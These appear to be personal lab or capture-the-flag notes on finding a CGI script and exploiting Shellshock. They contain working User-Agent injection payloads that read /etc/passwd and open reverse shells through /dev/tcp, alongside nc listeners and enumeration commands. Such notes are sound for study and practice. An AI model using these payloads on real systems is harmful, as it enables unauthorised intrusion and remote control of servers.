> dirb http://10.129.88.173
.. http://10.129.88.173/cgi-bin/ ..found/forbidden
.. http://10.129.88.173/server-status/ ..found/forbidden
> dirb http://10.129.88.173/cgi-bin/ -X .sh
> dirb http://10.129.88.173/cgi-bin/ -X .sh,.php,.cgi,.pl,.py
.. http://10.129.88.173/cgi-bin/user.sh ..found!
nmap
didnt help at all:
> nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.129.88.173
try this next time
nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/vulnscript.sh 10.x.x.x
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56 -f
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -x sh,cgi,pl,py,php
-f: flag appends / to end of directory
-x: file extensions to search for
nc -nvlp 4444
User-Agent: () { :; }; /bin/bash -c 'ping -c 3 $MyIP:4444'
curl -H 'User-Agent: () { :; }; /bin/bash -c 'ping -c 3 $MyIP:4444'' http://$IP:10000/session_login.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'whoami'" http://$IP/cgi-bin/user.sh
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://$IP/cgi-bin/user.sh
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$MyIP/4444 0>&1" http://$IP/cgi-bin/user.sh
nc -nvlp 4444 ..Connected!
User-Agent:
() { :; };/bin/echo hello ..no results, may still be a blind injection
() { :; }; sleep 10 ..if it sleeps, it is vuln
() { :; }; bash -i >& /dev/tcp/10.10.14.73/4444 0>&1
nc -nvlp 4444 ..Connected!
